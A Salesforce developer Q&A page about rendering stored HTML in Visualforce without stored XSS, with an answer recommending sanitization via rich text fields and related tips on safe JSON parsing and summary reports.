[SalesForce] How to display custom HTML in the Visualforce Page

I created a visualforce page, and i get some data(HTML) from webservice and store it in Custom Object as LongText, When i retrieve it and display in my visual force page something like this

<apex:outputText value = "{!myobjdata}" escape=false/>

It works fine, But when i give my application for the review, Then the Security Scanner gives error with above line and SELECT query of my object in class file (XSS_STORED)

Then I read about this XSS, and I added my data to visualforce page as below

<apex:outputText value = "{!HTMLENCODE(myobjdata)}" escape=false/>

But, now the data(HTML) in my object shows as it is like

<div><ul>someinfo<li>point1</li><li>point2</li></ul></div>

in my visualforce page
The HTML content is not rendered, How can i Overcome these issues (Mainly XSS)

Please help

Best Answer

If you want to render HTML from an Apex Controller into a component unescaped you need to make sure that there is no active content, otherwise you will have a stored cross site scripting vulnerability. Currently the only (sane) way to do this is to pull the HTML from a rich text field. This will sanitize the html and make it safe for rendering via an escape='false' attribute.

The scanner will still complain because the scanner doesn't know about data types. That's fine, it's a false positive, and you will always get false positives. It wont cause trouble for you in the security review -- just make a note that this is coming from a Rich Text Field and so is safe to render unescaped.

So the real issue is whether the html is safe to render or not. If it's safe, then ignore the scanner, if it's not safe, you need to make it safe by storing it in a rich text field and then pulling it back out.

If it's not safe, and you try to trick the scanner by first encoding and then unencoding before rendering, then you will succeed in both tricking the scanner and inserting a vulnerability into your application, violating the Master Services Agreement that you signed, and compromising the security of anyone using this code.

The scanner is a tool meant to help you by pointing out possible issues in your code, but what matters is the actual security of your code.

Related Solutions

[SalesForce] Checkmarx and JSON.serialize

Your page's javascript is effectively using the eval style of deserializing JSON which has been frowned upon in general ever since browsers started having pretty widespread support for JSON.parse.

If you don't need to support old versions of IE (and if you do there's polyfils) it's really, really a better idea to do something like

var recent = JSON.parse('{!JSENCODE(recent)}');

Is it really that much better from a security perspective? Not really dramatically in your case, but in more complex situations it can possibly have a tangible impact.

Also, since JSON is a subset of javascript in modern browsers it's not uncommon to see a performance boost using JSON methods over eval-style. JSON methods also handle escape characters that might be invalid in other places.

[SalesForce] summary report on visual force page

You can do this if all of the values or components of the values you need exist in the database. You will need to write your own controller and own Visualforce page with renderAs="pdf". SOQL Aggregate functions give you the ability to summarize data with functions such as SUM. The feasibility of this is dependent on your data set size. If it is larger than the governor limits will allow for your query, you may have to summarize the data in a batch job first.

Another alternative is to use the Salesforce1 Reporting API in Apex (formerly known as Analytics API via Apex). With this, you can create the summary report that you want and then query the data in your Apex controller. There is support for summary reports in the API.

Best Answer

Related Solutions

[SalesForce] Checkmarx and JSON.serialize

[SalesForce] summary report on visual force page

Related Topic